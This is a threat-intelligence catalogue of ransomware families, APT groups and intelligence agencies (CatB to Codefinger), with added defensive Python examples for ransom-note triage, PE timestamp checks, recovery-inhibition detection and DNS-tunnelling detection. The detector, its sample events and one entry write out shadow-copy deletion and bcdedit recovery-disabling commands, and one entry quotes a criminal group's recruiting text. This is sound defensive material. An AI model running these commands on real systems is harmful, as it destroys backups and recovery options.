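Because CatB neither renames files nor drops a note, the usual "look for *.locked and README" triage finds nothing. The following is an added example (not the page's or any vendor's code) of a triage helper that detects the prepended ransom message instead and separates it from the encrypted body. The marker strings are the contact addresses quoted in the entry above; the sample files are constructed here, and the assumption that the note is plain text terminated by a NUL byte is illustrative only, since the real offset must come from sample analysis.

```python
"""Triage helper for files hit by CatB-style ransomware, which prepends its
ransom message to each encrypted file instead of renaming files or dropping
a note. Added example; the marker strings are the contact addresses quoted
in the entry above, the sample files are constructed here, and the note
terminator (a NUL byte) is an assumption for illustration."""
import os
import tempfile

# Contact addresses named in the entry above; any one of them inside the
# first few kilobytes of a file is treated as a prepended ransom message.
MARKERS = (b"catB9991@protonmail.com", b"fishA001@protonmail.com")
# Assumption: the note is plain text and the encrypted payload begins at the
# first NUL byte after the note. Real samples need the exact offset from analysis.
HEADER_SCAN_BYTES = 4096


def split_prepended_note(data: bytes):
    """Return (note_text, payload) if data starts with a ransom note, else None."""
    head = data[:HEADER_SCAN_BYTES]
    if not any(m in head for m in MARKERS):
        return None
    end = data.find(b"\x00")
    if end == -1:
        end = len(data)
    return data[:end].decode("utf-8", errors="replace"), data[end + 1:]


def scan_tree(root: str):
    """Walk a directory and return {path: note_text} for every flagged file."""
    hits = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue
            res = split_prepended_note(data)
            if res:
                hits[path] = res[0]
    return hits


def build_sample_tree():
    """Constructed sample: one 'encrypted' file carrying a prepended note and
    one untouched document. Returns the temporary directory path."""
    root = tempfile.mkdtemp(prefix="catb_demo_")
    note = (b"Your files are encrypted. Contact catB9991@protonmail.com "
            b"or fishA001@protonmail.com. The price rises every day.\x00")
    with open(os.path.join(root, "report.docx"), "wb") as fh:
        fh.write(note + bytes(range(256)))  # fake ciphertext body
    with open(os.path.join(root, "notes.txt"), "wb") as fh:
        fh.write(b"quarterly planning notes, nothing encrypted here")
    return root


if __name__ == "__main__":
    demo_root = build_sample_tree()
    for path, note in scan_tree(demo_root).items():
        print(path, "->", note[:60])
```

Matching on the contact addresses rather than a fixed header keeps the check useful across re-worded notes; on a real incident, replace MARKERS with the strings recovered from one confirmed sample and run scan_tree over the file shares before touching anything.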

CCECrypt

Ransomware

Central de Reunión de Inteligencia Militar

Military Intelligence Collection Center (CRIM) – Central de Reunión de Inteligencia Militar

Central Intelligence Agency

Central Intelligence Agency (CIA)

Central Intelligence Organisation

Central Intelligence Organisation (CIO)

Central Intelligence Service (CIS)

Central Intelligence Service (CIS)

Central Security Treatment Organization

Ransomware

Centro de Inteligencia contra el Terrorismo y el Crimen Organizado

Intelligence Center for Counter-Terrorism and Organized Crime - (Centro de Inteligencia contra el Terrorismo y el Crimen Organizado) (CITCO)

Centro Intelligence Interforze

Centro Intelligence Interforze (CII) - Joint Intelligence Center

Cephalo

Ransomware

Cephalus

Cephalus is an active extortion or ransomware group tracked by RansomLook.

CeranaKeeper

CeranaKeeper is a China-aligned APT that has been active since at least early 2022, primarily targeting governmental institutions in Asian countries. The group employs custom backdoors like TONESHELL and OneDoor, leveraging cloud services such as Dropbox and OneDrive for data exfiltration. CeranaKeeper utilizes techniques like side-loading, brute-force attacks, and the deployment of BAT scripts to extend its reach within compromised networks. Their operations are characterized by a relentless pursuit of sensitive data, adapting their toolset and methods to evade detection.

Cerber

Ransomware

cerberimposter

Cerber Imposter is a post-2019 rebrand of the Cerber ransomware family that resurfaced in late 2021 with updated targeting of enterprise environments. Unlike its classic counterpart, Cerber Imposter uses the .locked file extension and a recovery note named __$$RECOVERY_README$$__.html. It does not reuse the original Cerber codebase; it borrows the branding while operating with new cryptographic implementations and deployment tactics. Threat actors have leveraged known remote code execution vulnerabilities in Atlassian Confluence (CVE-2021-26084) and GitLab (CVE-2021-22205) to deliver it. The rebranded variant has compromised servers in the U.S., Germany, China and Russia, a broader scope than early Cerber campaigns.

Cerberos

Ransomware

cerbersyslock

CerBerSysLock first appeared in December 2017 as a cryptoransomware imposter, leveraging Cerber-style branding to deceive victims. It uses XOR-based encryption to lock files and appends extensions such as .CerBerSysLocked0009881. Victims receive a ransom note titled “HOW TO DECRYPT FILES.txt”, which falsely claims to be from the Cerber ransomware. The note includes an email contact—TerraBytefiles@scryptmail.com—and instructs victims to reference their ID (e.g., "CerBerSysLocked0009881") when communicating. The ransomware is technically linked to the Xorist family and is generally considered an opportunistic, low-profile scam rather than part of a broader Ransomware-as-a-Service (RaaS) operation.

CerberTear Ransomware

It most likely targets English-speaking users, since the note is written in English, though anyone who understands English can be harmed. The attacker spreads it through email spam, fake updates and malicious attachments. All of the victim's files are affected, including music, MS Office and OpenOffice documents, pictures, videos and shared online files.

ChainedShark

ChainedShark is an APT group targeting China's scientific research sector, particularly professionals in international relations and marine technology, with the intent to steal sensitive data. The group employs advanced techniques, including executable file reconstruction to create fragmented shellcode, and utilizes social engineering tactics to exploit professional scenarios for deceptive attacks. ChainedShark demonstrates a high level of technical sophistication, integrating N-day vulnerability exploits and custom trojans within meticulously designed attack chains. Its operations reflect a mature attack infrastructure and a clear evolutionary trajectory in tactics and execution.

Chamelgang

In Q2 2021, the PT Expert Security Center incident response team conducted an investigation in an energy company. The investigation revealed that the company's network had been compromised by an unknown group for the purpose of data theft. They gave the group the name ChamelGang (from the word "chameleon"), because the group disguised its malware and network infrastructure under legitimate services of Microsoft, TrendMicro, McAfee, IBM, and Google.

Chaos

Chaos is a rapidly evolving Ransomware-as-a-Service (RaaS) group first observed in early 2025. It is considered distinct from, and unaffiliated with, the Chaos Ransomware Builder that originated around 2021. Known for highly aggressive double-extortion operations, Chaos targets organizations across multiple platforms (Windows, ESXi, Linux and NAS) with fast, configurable encryption and optional partial-file encryption for speed and stealth. Attackers gain access through vulnerabilities, phishing or brokered credentials, then encrypt files while threatening to leak or destroy stolen data. Notable incidents include the breach of Optima Tax Relief, in which the group exfiltrated 69 GB of sensitive data before encrypting systems.

Charcoal Stork

Charcoal Stork is a threat actor believed to provide content used to fuel malvertising and search engine optimization (SEO) operations, which affiliates ultimately use to deliver malware to victim systems. Charcoal Stork is thought to be financially motivated, operating on a pay-per-install basis.[[Red Canary March 18 2024](/references/a86131cd-1a42-4222-9d39-221dd6e054ba)]

Charmant

Ransomware

Charming Kitten

Charming Kitten (aka Parastoo, aka Newscaster) is a group with a suspected nexus to Iran that targets organizations involved in government, defense technology, military, and diplomacy sectors.

Chartwig Ransomware

It targets English-speaking users and can therefore infect victims worldwide. It spreads through email spam, fake updates, malicious attachments and similar lures, and encrypts all of the victim's files, including music, MS Office and OpenOffice documents, pictures, videos and shared online files.

CHATTY SPIDER

A cybercriminal actor known to carry out "callback phishing" social engineering attacks.[[CrowdStrike 2025 Global Threat Report](/references/a69b0ce3-f314-4b32-bfb3-b1380c4f0ec4)]

Chaya_004

Chaya_004 is a Chinese threat actor identified through its malicious infrastructure: a network of servers hosting Supershell backdoors and various penetration-testing tools of Chinese origin, much of it on Chinese cloud providers. The actor's activity is linked to the exploitation of a specific vulnerability. Analysis of the infrastructure has revealed the TTPs associated with Chaya_004, indicating a sophisticated approach to its operations, and mitigation recommendations and proactive response measures have been developed from these findings.

Cheers

Cheers is a Linux-based ransomware variant observed starting in May 2022, engineered specifically to target VMware ESXi servers. The malware was developed from leaked Babuk ransomware source code and leverages the SOSEMANUK stream cipher combined with ECDH key exchange for encryption. It terminates all running virtual machines before renaming and encrypting log files and VM-related extensions—like .vmdk, .vmsn, and .vswp—appending a .Cheers extension. A ransom note titled "How To Restore Your Files.txt" is dropped per directory. The ransomware is attributed to the Chinese-affiliated group BRONZE STARLIGHT (also known as Emperor Dragonfly, DEV-0401), which has previously deployed other strains like Rook, NightSky, and Pandora. Cheers targets a range of industry sectors, with confirmed victims across healthcare, finance, logistics, and manufacturing.

Cheerscrypt

Ransomware

Chekyshka

Ransomware

ChernoLocker

Ransomware

Chernovite

Chernovite is a highly capable and sophisticated threat actor group that has developed a modular ICS malware framework called PIPEDREAM. They are known for targeting industrial control systems and operational technology environments, with the ability to disrupt, degrade, and potentially destroy physical processes. Chernovite has demonstrated a deep understanding of ICS protocols and intrusion techniques, making them a significant threat to critical infrastructure sectors.

Chief directorate of intelligence of the Ministry of Defence of Ukraine

Central Intelligence Directorate – Holovne Upravlinnya Rozvidky (HUR)

chilelocker

ChileLocker first emerged in August 2022 and is considered part of the broader ARCrypter ransomware family. It employs a double-extortion model, encrypting Windows and Linux/VMware ESXi systems and threatening data leaks. ChileLocker uses the NTRU public key cryptosystem for encryption and typically appends the .crypt extension to affected files. Following encryption, it drops a ransom note—often named readme_for_unlock.txt—and directs victims to a password-protected Tor negotiation portal, with the password provided in the note. The group also disables recovery mechanisms by deleting shadow copies. Its initial access tactics include exploitation of misconfigured RDP access, phishing, malicious installers, botnets, fake updates, and malvertising. The ransomware has impacted victims across various regions, including Chile, Mexico, Canada, Spain, and others.

ChinaYunLong

Ransomware

Chip Ransomware

It targets English-speaking users and can therefore infect victims worldwide. It spreads through email spam, fake updates, malicious attachments and similar lures, and encrypts all of the victim's files, including music, MS Office and OpenOffice documents, pictures, videos and shared online files.

chort

Chort is a relatively new data-extortion ransomware group that surfaced in late 2024, with confirmed activity beginning in October–November 2024. It operates under a double-extortion model—exfiltrating sensitive data before encrypting systems—and organizes victims via a Tor-hosted data leak site (DLS). The group has targeted organizations in the U.S. education sector (including schools and nonprofits) and in Kuwait's agriculture sector, among others. Technical behaviors include execution via PowerShell and removal of shadow copies to disrupt recovery. The group's approach emphasizes public pressure through data exposure rather than technical innovation.

Christmas

Ransomware

CHRYSENE

Adversaries abusing ICS (based on Dragos Inc adversary list). This threat actor targets organizations involved in oil, gas, and electricity production, primarily in the Gulf region, for espionage purposes. According to one cybersecurity company, the threat actor “compromises a target machine and passes it off to another threat actor for further exploitation.”

CIA Special Agent 767 Ransomware (FAKE!!!)

It targets English-speaking users and can therefore infect victims all over the world. It spreads through email spam, fake updates, malicious attachments and similar lures. It supposedly encrypts all of the victim's files (music, MS Office and OpenOffice documents, pictures, videos, shared online files), but nothing is actually encrypted and nothing happens; the attacker nevertheless demands $100, rising to $250 after five days and to $500 after that. After payment is received, the victim gets the following message, informing them that they have been fooled and simply needed to delete the note: https://4.bp.blogspot.com/-T8iSbbGOz84/WFGZEbuRfCI/AAAAAAAACm0/SO8Srwx2UIM3FPZcZl7W76oSDCsnq2vfgCPcB/s1600/code2.jpg

CiberInteligenciaSV

CiberInteligenciaSV is a threat actor that leaked 5.1 million Salvadoran records on Breach Forums. They have also compromised El Salvador's state Bitcoin wallet, Chivo, leaking its source code and VPN credentials. The group aims to obscure their involvement by associating with the Guacamaya group and its proxies.

Cicada3301 Ransomware Group

A suspected ransomware-as-a-service ("RaaS") group first observed in June 2024, which extorts victims via traditional ransomware encryption and by threatening to leak allegedly exfiltrated data onto the web.[[Truesec AB August 30 2024](/references/de2de0a9-17d2-41c2-838b-7850762b80ae)]

cicada3301

Cicada3301 is a sophisticated Ransomware-as-a-Service (RaaS) group that emerged in June 2024. It’s written in Rust and supports cross-platform operations, targeting Windows, Linux, VMware ESXi, NAS, and even PowerPC systems. Technically, its ransomware shares many traits with BlackCat/ALPHV, such as use of ChaCha20 encryption, Rust-based structure, similar configuration interfaces, and methods for shutting down virtual machines and deleting snapshots. Cicada3301 also implements double-extortion tactics—encrypting or exfiltrating data and publishing it on Tor-based leak sites. The group appears to have established an affiliate program, demonstrated through their deployment interfaces and recruitment tactics via forums like RAMP. Operations are believed to be highly professional, possibly involving former ALPHV developers or affiliates.

Ciphbit

CiphBit is a crypto-ransomware first detected in April 2023. It uses a double-extortion model, encrypting files and threatening to leak stolen data via a Tor-hosted portal if the ransom is not paid. The malware appends to each encrypted filename a string containing a unique victim ID, the attacker's email address (on onionmail.org) and a four-character random extension, which makes file identification and recovery especially difficult. Victims span banking, manufacturing, healthcare, logistics and professional services across North America and Europe. The group is classified as a data broker because of its evolving extortion methods, which combine free leaks and selective leaks to pressure victims. Recent high-profile victims include iptelecom GmbH (Germany) and Therma Seal Insulation Systems (USA), reaffirming its cross-industry reach.

cipherforce

For those out of the loop, you may already know us as TeamPCP or Shellforce; we have been active a while publishing data and writing malware. CipherForce is a newer project; we are starting to find affiliates and are hoping to begin publishing companies soon.

Cipherwolf

Cipherwolf is an active ransomware-as-a-service operation tracked by RansomLook.

CIRCUS SPIDER

According to Crowdstrike, the NetWalker ransomware is being developed and maintained by a Russian-speaking actor designated as CIRCUS SPIDER. Initially discovered in September 2019 and having a compilation timestamp dating back to 28 August 2019, NetWalker has been found to be used in Big Game Hunting (BGH)-style operations while also being distributed via spam. CIRCUS SPIDER is advertising NetWalker as being a closed-affiliate program, and verifies applicants before they are accepted as an affiliate. The requirements range from providing proof of previous revenue in similar affiliate programs, experience in the field and what type of industry the applicant is targeting.

CIS Corps (Ireland)

Communications and Information Services Corps (CIS) SIGINT Section

CISMIL

Military Intelligence and Security Service - Centro de Informações e Segurança Militares (CISMIL)

CL-STA-0043

CL-STA-0043 is a highly skilled and sophisticated threat actor, believed to be a nation-state, targeting governmental entities in the Middle East and Africa. They exploit vulnerabilities in on-premises Internet Information Services and Microsoft Exchange servers to infiltrate target networks. They engage in reconnaissance, locate vital assets, and have been observed using native Windows tools for privilege escalation.

CL-STA-0048

CL-STA-0048 is a Chinese state-backed APT that targets strategic sectors in South Asia, particularly government and telecommunications entities, with a focus on espionage. The group has been linked to SAP NetWeaver intrusions and employs techniques such as DNS beaconing using ping commands and exploiting unpatched vulnerabilities in services like IIS, Apache Tomcat, and MSSQL. Analysts have observed its use of reverse shell commands and command-and-control traffic directed to specific IP addresses. The actor adapts its methods to evade detection and maintain persistent access to high-value networks.

CL-STA-1009

CL-STA-1009 is a threat activity cluster associated with a suspected nation-state actor utilizing the Airstalk malware family, which includes both PowerShell and .NET variants. The .NET variant features a multi-threaded C2 protocol, versioning, and complex tasks, employing defense evasion techniques such as signed binaries with a revoked certificate and manipulation of PE timestamps. The malware is believed to have been used in supply chain attacks, with a development timeline established through signed timestamps. The persistent threat posed by this actor is underscored by the adaptive nature of the malware.
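The PE timestamp manipulation mentioned above is cheap for an attacker and cheap to check for. The following is an added example (not the page's or any vendor's code) that reads the COFF TimeDateStamp directly from the PE headers, without a third-party parser, and compares it with a signing time supplied by the caller, such as the Authenticode countersignature time already extracted from the PKCS#7 blob. The minimal PE images it builds are constructed for the demonstration, and the plausibility bounds are assumptions to tune.

```python
"""Checker for the PE timestamp manipulation attributed to CL-STA-1009 above.
Added example, not the page's or any vendor's code. It reads the COFF
TimeDateStamp straight from the PE headers and compares it with a signing
time supplied by the caller; the minimal PE images are constructed and the
sanity bounds are assumptions."""
import struct
from datetime import datetime, timezone, timedelta


def utc(year, month, day):
    """Convenience constructor for UTC datetimes."""
    return datetime(year, month, day, tzinfo=timezone.utc)


EARLIEST_PLAUSIBLE = utc(1995, 1, 1)   # assumption: nothing older is a real build
STALE_BUILD = timedelta(days=365 * 3)  # assumption: signing years after build is odd


def coff_timestamp(pe: bytes) -> datetime:
    """Return the COFF header TimeDateStamp of a PE image as a UTC datetime."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    # COFF header follows the 4-byte signature: Machine(2) Sections(2) TimeDateStamp(4)
    ts, = struct.unpack_from("<I", pe, e_lfanew + 8)
    return datetime.fromtimestamp(ts, tz=timezone.utc)


def timestamp_findings(pe: bytes, signing_time: datetime, now: datetime = None):
    """Return anomaly labels for the compile timestamp relative to the signing
    time (e.g. the Authenticode countersignature time) and the current time."""
    now = now or datetime.now(timezone.utc)
    built = coff_timestamp(pe)
    findings = []
    if built < EARLIEST_PLAUSIBLE:
        findings.append("timestamp_before_plausible_range")  # zeroed or backdated
    if built > now:
        findings.append("timestamp_in_future")
    if built > signing_time:
        findings.append("built_after_signed")                # impossible unless edited
    if signing_time - built > STALE_BUILD:
        findings.append("signed_years_after_build")         # stale build or backdated stamp
    return findings


def make_min_pe(timestamp: int) -> bytes:
    """Constructed minimal PE header: DOS stub, PE signature and a COFF header
    (x64, one section, the given timestamp)."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x8664, 1, timestamp, 0, 0, 0, 0x22)
    return bytes(dos) + b"PE\0\0" + coff


if __name__ == "__main__":
    signed = utc(2024, 3, 1)
    honest = make_min_pe(int(utc(2024, 2, 20).timestamp()))
    edited = make_min_pe(int(utc(2030, 1, 1).timestamp()))
    print(coff_timestamp(honest), timestamp_findings(honest, signed))
    print(coff_timestamp(edited), timestamp_findings(edited, signed))
```

A "built_after_signed" or "timestamp_in_future" result is not proof of malice on its own (reproducible builds and some linkers write odd stamps), but combined with a revoked signing certificate, as in the entry above, it is a strong triage signal.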

CL-STA-1087

CL-STA-1087 is a suspected state-sponsored espionage campaign operating out of China, targeting military organizations in Southeast Asia. The actor has demonstrated operational patience, maintaining dormant access for extended periods while focusing on precision intelligence collection and employing robust operational security measures. Their infrastructure includes the use of a legitimate cloud service for C2 operations, indicating a cloud-native approach. File timestamps and other indicators trace the campaign's activity back to 2020, suggesting a long-running operation.

Cl0p

TA505 is a cyber criminal group that has been active since at least 2014. TA505 is known for frequently changing malware, driving global trends in criminal malware distribution, and ransomware campaigns involving Clop. [Proofpoint TA505 Sep 2017](https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta505-dridex-globeimposter) [Proofpoint TA505 June 2018](https://www.proofpoint.com/us/threat-insight/post/ta505-shifts-times) [Proofpoint TA505 Jan 2019](https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505) [NCC Group TA505](https://research.nccgroup.com/2020/11/18/ta505-a-brief-history-of-their-time/) [Korean FSI TA505 2020](https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1382.do?page=1&column=&search=&searchSDate=&searchEDate=&bbsDataCategory=)

Clay Typhoon

Microsoft threat actor profile. Origin/Threat: China.

Clay

Ransomware

Clearwater

Clearwater is an active extortion or ransomware group tracked by RansomLook.

Clever Kitten

Clever Kitten is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

Click Me Ransomware

It most likely targets English-speaking users, since the note is written in English, though anyone who understands English can be harmed. The attacker spreads it through email spam, fake updates and malicious attachments. All of the victim's files are affected, including music, MS Office and OpenOffice documents, pictures, videos and shared online files. The attacker tries to get the user to play a game; when the user clicks the button there is no game, only the 20 pictures in the .gif below: https://3.bp.blogspot.com/-1zgO3-bBazs/WAkPYqXuayI/AAAAAAAABxI/DO3vycRW-TozneSfRTdeKyXGNEtJSMehgCLcB/s1600/all-images.gif

ClicoCrypter-2

Ransomware

ClicoCrypter

Ransomware

Cloak Su Locker Leak

Cloak Su Locker Leak is an active extortion or ransomware group tracked by RansomLook.

Cloak

Cloak is a cybercriminal ransomware group that first appeared publicly in mid-2023, operating with a double-extortion model. It deploys an ARCrypter variant derived from Babuk, delivered via loaders that terminate security and backup services, delete shadow copies, and install encrypted payloads using algorithms like HC-128 combined with Curve25519 key generation. Victims include entities such as the Virginia Attorney General’s Office, whose IT systems were disrupted and whose data (134 GB) was exfiltrated and listed on Cloak’s Tor leak site. Cloak has been linked to other ARCrypter variants like Good Day, sharing victim portals and infrastructure. Its operations reportedly use initial access brokers, phishing, malvertising, and exploit kits for network infiltration.

Clock

Ransomware. Does not encrypt anything.

CLOCKWORK SPIDER

Opportunistic actor that installs custom root certificate on victim to support man-in-the-middle network monitoring.

Clop Torrents

Clop Torrents is an active extortion or ransomware group tracked by RansomLook.

Clouded

Ransomware

CloudSorcerer

CloudSorcerer is a sophisticated APT targeting Russian government entities, utilizing cloud infrastructure for stealth monitoring and data exfiltration. The malware leverages APIs and authentication tokens to access cloud resources for command and control, with GitHub serving as its initial C2 server. CloudSorcerer operates as separate modules depending on the process it's running in, executing from a single executable and utilizing complex inter-process communication through Windows pipes. The actor behind CloudSorcerer shows similarities to the CloudWizard APT in modus operandi, but the unique code and functionality suggest it is a new threat actor inspired by previous techniques.

CloudSword Ransomware

It targets English-speaking users and can therefore infect victims worldwide. It uses the name "Window Update" to confuse its victims and imitates the Windows Update process while disabling Windows Startup Repair and changing the boot status policy with these commands: bcdedit.exe /set {default} recoveryenabled No and bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
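The two bcdedit commands quoted above, together with the shadow copy deletion described in the ChileLocker, Chort and Cloak entries, are the recovery-inhibition stage that almost every encryptor runs before it touches user data, which makes them a better detection point than the encryption itself. The following is an added example (not the page's or any vendor's code) of a detector over process-creation events. The event lines are constructed, the layout (timestamp|host|image|command line) is an assumed export format, and the rule list is a starting point rather than a complete catalogue.

```python
"""Detection sketch for the recovery-inhibition commands described in the
ChileLocker, Chort, Cloak and CloudSword entries. Added example, not the
page's or any vendor's code; the event lines are constructed and the
field layout (timestamp|host|image|command line) is an assumed export format."""
import re

# Each rule: a technique label and a case-insensitive regex over the command line.
# The bcdedit patterns are the exact commands quoted in the CloudSword entry;
# the shadow copy patterns cover the common vssadmin/wmic/wbadmin forms.
RULES = [
    ("shadow_copy_delete",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)),
    ("shadow_copy_delete",
     re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("backup_catalog_delete",
     re.compile(r"wbadmin(\.exe)?\s+delete\s+catalog", re.I)),
    ("boot_recovery_disabled",
     re.compile(r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+recoveryenabled\s+no", re.I)),
    ("boot_failures_ignored",
     re.compile(r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+bootstatuspolicy\s+ignoreallfailures", re.I)),
]


def classify(command_line: str):
    """Return the technique labels a command line matches (empty list if none)."""
    return [label for label, rx in RULES if rx.search(command_line)]


def scan_events(lines):
    """Parse 'ts|host|image|cmdline' lines and return one finding per matching event."""
    findings = []
    for line in lines:
        parts = line.split("|", 3)
        if len(parts) != 4:
            continue
        ts, host, image, cmd = parts
        labels = classify(cmd)
        if labels:
            findings.append({"ts": ts, "host": host, "image": image,
                             "labels": labels, "cmd": cmd})
    return findings


def hosts_with_multiple_techniques(findings):
    """Hosts where more than one distinct technique fired: the strongest sign that
    a ransomware pre-encryption stage, not an admin one-off, is running."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f["host"], set()).update(f["labels"])
    return sorted(h for h, labels in by_host.items() if len(labels) > 1)


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    "2024-01-10T09:02:11Z|WS-17|C:\\Windows\\System32\\bcdedit.exe|bcdedit.exe /set {default} recoveryenabled No",
    "2024-01-10T09:02:12Z|WS-17|C:\\Windows\\System32\\bcdedit.exe|bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures",
    "2024-01-10T09:02:15Z|WS-17|C:\\Windows\\System32\\vssadmin.exe|vssadmin.exe Delete Shadows /All /Quiet",
    "2024-01-10T09:05:40Z|SRV-02|C:\\Windows\\System32\\vssadmin.exe|vssadmin.exe list shadows",
    "2024-01-10T09:07:03Z|SRV-02|C:\\Windows\\System32\\wbadmin.exe|wbadmin delete catalog -quiet",
]

if __name__ == "__main__":
    found = scan_events(SAMPLE_EVENTS)
    for f in found:
        print(f["ts"], f["host"], f["labels"], f["cmd"])
    print("multi-technique hosts:", hosts_with_multiple_techniques(found))
```

Single matches will fire on legitimate administration (backup software deletes old shadows too), so alert on the host-level correlation from hosts_with_multiple_techniques and treat single hits as enrichment.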

Cmd Organization

Cmd Organization is an active extortion or ransomware group tracked by RansomLook.

Cmd

Ransomware

CNH

Ransomware

Coast Guard Intelligence Directorate (page does not exist)

Coast Guard Intelligence Directorate (law enforcement)

Coast Guard Intelligence

Coast Guard Intelligence (CGI)

COBALT JUNO

COBALT JUNO has operated since at least 2013 and focused on targets located in the Middle East including Iran, Jordan, Egypt & Lebanon. COBALT JUNO custom spyware families SABER1 and SABER2, include surveillance functionality and masquerade as legitimate software utilities such as Adobe Updater, StickyNote and ASKDownloader. CTU researchers assess with moderate confidence that COBALT JUNO operated the ZooPark Android spyware since at least mid-2015. ZooPark was publicly exposed in 2018 in both vendor reporting and a high profile leak of C2 server data. COBALT JUNO is linked to a private security company in Iran and outsources aspects of tool development work to commercial software developers. CTU researchers have observed the group using strategic web compromises to deliver malware. CTU researchers’ discovery of new C2 domains in 2019 suggest the group is still actively performing operations.

COBALT KATANA

COBALT KATANA has been active since at least March 2018, and it focuses many of its operations on organizations based in or associated with Kuwait. The group has targeted government, logistics, and shipping organizations. The threat actors gain initial access to targets using DNS hijacking, strategic web compromise with SMB forced authentication, and password brute force attacks. COBALT KATANA operates a custom platform referred to as the Sakabota Framework, also referred to as Sakabota Core, with a complimentary set of modular backdoors and accessory tools including Gon, Hisoka, Hisoka Netero, Killua, Diezen, and Eye. The group has implemented DNS tunnelling in its malware and malicious scripts and also operates the HyphenShell web shell to strengthen post-intrusion access. CTU researchers assess with moderate confidence that COBALT KATANA operates on behalf of Iran, and elements of its operations such as overlapping infrastructure, use of DNS hijacking, implementation of DNS-based C2 channels in malware and web shell security mechanisms suggest connections to COBALT GYPSY and COBALT EDGEWATER.
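Both the ping-based DNS beaconing attributed to CL-STA-0048 above and the DNS tunnelling attributed to COBALT KATANA leave the same trace in resolver logs: one zone receiving many unique, high-entropy subdomains, often from a process that has no business resolving them. The following is an added example (not the page's or any vendor's code) of a heuristic detector over DNS query logs. The log lines are constructed, the layout (timestamp|host|process|query) is an assumed export format, and the thresholds are starting points to tune against a real baseline.

```python
"""Heuristic detector for the DNS-based C2 described in the CL-STA-0048 entry
(beaconing through ping to attacker-controlled hostnames) and the COBALT KATANA
entry (DNS tunnelling). Added example, not the page's or any vendor's code;
the log lines are constructed, the line layout (timestamp|host|process|query)
is an assumed export format, and the thresholds are assumptions to tune."""
import math
from collections import defaultdict

MIN_UNIQUE_SUBDOMAINS = 8    # many distinct labels under one zone = data encoded in names
MIN_LABEL_ENTROPY = 3.0      # bits/char; encoded data sits well above natural words
PING_SUSPECT_LABEL_LEN = 16  # ping.exe resolving a long, random-looking label


def shannon_entropy(s: str) -> float:
    """Shannon entropy in bits per character of a string."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_query(q: str):
    """Return (leftmost_label, zone); zone is the last two labels. Queries with
    fewer than three labels carry no subdomain and return (None, zone)."""
    labels = q.rstrip(".").lower().split(".")
    if len(labels) < 3:
        return None, ".".join(labels)
    return labels[0], ".".join(labels[-2:])


def analyse(lines):
    """Return {(host, zone): [reasons]} for suspicious DNS activity."""
    subdomains = defaultdict(set)
    entropies = defaultdict(list)
    ping_hits = defaultdict(int)
    for line in lines:
        parts = line.split("|", 3)
        if len(parts) != 4:
            continue
        _, host, proc, query = parts
        label, zone = split_query(query)
        if label is None:
            continue
        key = (host, zone)
        subdomains[key].add(label)
        entropies[key].append(shannon_entropy(label))
        if proc.lower().endswith("ping.exe") and len(label) >= PING_SUSPECT_LABEL_LEN:
            ping_hits[key] += 1
    findings = {}
    for key in subdomains:
        reasons = []
        avg_ent = sum(entropies[key]) / len(entropies[key])
        if len(subdomains[key]) >= MIN_UNIQUE_SUBDOMAINS and avg_ent >= MIN_LABEL_ENTROPY:
            reasons.append("many_high_entropy_subdomains")
        if ping_hits[key]:
            reasons.append("ping_to_encoded_label")
        if reasons:
            findings[key] = reasons
    return findings


def sample_lines():
    """Constructed log: one host tunnelling under c2-zone.example, two normal hosts."""
    lines = []
    chunks = ["6a7b3c9d2e1f", "d41d8cd98f00", "9e107d9d372b", "ab56b4d92b40", "3c59dc048e88",
              "4b43b0aee35e", "c4ca4238a0b9", "e4da3b7fbbce", "1679091c5a88"]
    for i, chunk in enumerate(chunks):
        lines.append(f"2024-05-02T10:00:{i:02d}Z|WS-31|C:\\Windows\\System32\\ping.exe|{chunk}0a1b2c.c2-zone.example")
    lines.append("2024-05-02T10:00:20Z|WS-31|C:\\Windows\\System32\\svchost.exe|www.example.org")
    lines.append("2024-05-02T10:00:21Z|SRV-08|C:\\Windows\\System32\\svchost.exe|mail.example.org")
    lines.append("2024-05-02T10:00:22Z|SRV-08|C:\\Windows\\System32\\ping.exe|gateway.corp.example")
    return lines


if __name__ == "__main__":
    for (host, zone), reasons in analyse(sample_lines()).items():
        print(host, zone, reasons)
```

CDN and telemetry zones legitimately produce many high-entropy subdomains, so in production the zone-level rule needs an allowlist; the ping.exe rule is the cheaper, more specific signal for the CL-STA-0048 pattern because a built-in tool resolving encoded labels has no benign explanation.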

Cobalt

A criminal group dubbed Cobalt is behind synchronized ATM heists that saw machines across Europe, CIS countries (including Russia), and Malaysia being raided simultaneously, in the span of a few hours. The group has been active since June 2016, and their latest attacks happened in July and August.

CobraLocker

Ransomware

CockBlocker Ransomware

It targets English-speaking users and can therefore infect victims worldwide. It spreads through email spam, fake updates, malicious attachments and similar lures, and encrypts all of the victim's files, including music, MS Office and OpenOffice documents, pictures, videos and shared online files.

Code Virus Ransomware

It targets English-speaking users and can therefore infect victims worldwide. It spreads through email spam, fake updates, malicious attachments and similar lures, and encrypts all of the victim's files, including music, MS Office and OpenOffice documents, pictures, videos and shared online files.

Codefinger

